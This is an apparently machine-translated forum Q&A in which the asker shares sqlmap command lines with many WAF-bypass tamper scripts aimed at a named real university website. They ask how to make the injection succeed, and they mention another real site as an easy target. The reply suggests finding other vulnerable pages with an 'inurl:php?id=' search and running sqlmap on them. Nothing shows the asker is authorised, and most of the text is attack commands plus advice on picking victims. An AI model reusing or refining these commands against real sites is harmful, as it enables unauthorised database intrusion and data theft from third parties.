Sqlmap参数"可能不是可注射的"

时间:2015-07-17 05:44:32

标签: sql-injection sqlmap

我从sqlmap开始,我有以下疑问: 当我尝试使用sqlmap(试图绕过waf)时使用这个片段:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

或者这个:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

我在控制台中看到了:

[警告]启发式(基本)测试显示GET参数'选项'可能不会注射 [警告]启发式(基本)测试显示GET参数' view'可能不是可注射的

还尝试在我的网站中找到类似于:http://www.cafe53rd.com/menu.php?item_id=3的网址 因为我检查了这种网址最容易访问但我无法在网站上找到它进行审核。

在以下Site ("http://prefing...")

中制作它的正确代码是什么

抱歉我的英语不好。 非常感谢你。

1 个答案:

答案 0 :(得分:1)

此错误只是表明正在执行的注入技术类型没有给出正面响应。 我已经面对它并通过获得备用链接解决了它。 我建议找一些其他易受攻击的链接,使用搜索inurl:php?id =然后在sqlmap中插入链接。